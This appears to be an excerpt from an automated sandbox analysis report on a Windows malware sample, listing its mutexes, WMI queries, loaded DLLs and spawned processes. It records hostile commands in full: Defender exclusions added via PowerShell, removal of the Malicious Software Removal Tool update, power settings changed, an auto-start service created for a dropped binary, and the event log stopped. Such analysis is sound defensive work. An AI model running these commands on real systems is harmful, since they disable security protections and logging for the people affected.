              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2536:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Global\zwmrpsqnvjcqurym
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2724:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5704:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5712:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gzr1fdm.dyh.ps1Jump to behavior
              Source: WWhhc3A0rs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: WWhhc3A0rs.exeReversingLabs: Detection: 57%
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeFile read: C:\Users\user\Desktop\WWhhc3A0rs.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\WWhhc3A0rs.exe "C:\Users\user\Desktop\WWhhc3A0rs.exe"
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "VKWMZEFB"
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "VKWMZEFB"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\conhost.exe conhost.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "VKWMZEFB"Jump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto"Jump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "VKWMZEFB"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\conhost.exe conhost.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
